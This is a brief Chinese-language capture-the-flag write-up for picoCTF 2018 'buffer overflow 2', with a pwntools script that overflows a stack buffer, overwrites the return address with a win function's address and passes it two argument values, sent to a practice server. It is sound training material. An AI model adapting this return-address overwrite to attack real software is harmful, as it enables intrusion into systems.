picoctf_2018_buffer_overflow_2
查看保护
有溢出,还有一个getflag函数,但是想要利用需要给两个参数,结合32位下的系统调用规则即可get flag
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27317)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
win = 0x80485CB
p1 = b'a' * (0x6c + 4) + p32(win) + p32(0xDEADBEEF) + p32(0xDEADBEEF) + p32(0xDEADC0DE)
r.sendline(p1)
r.interactive()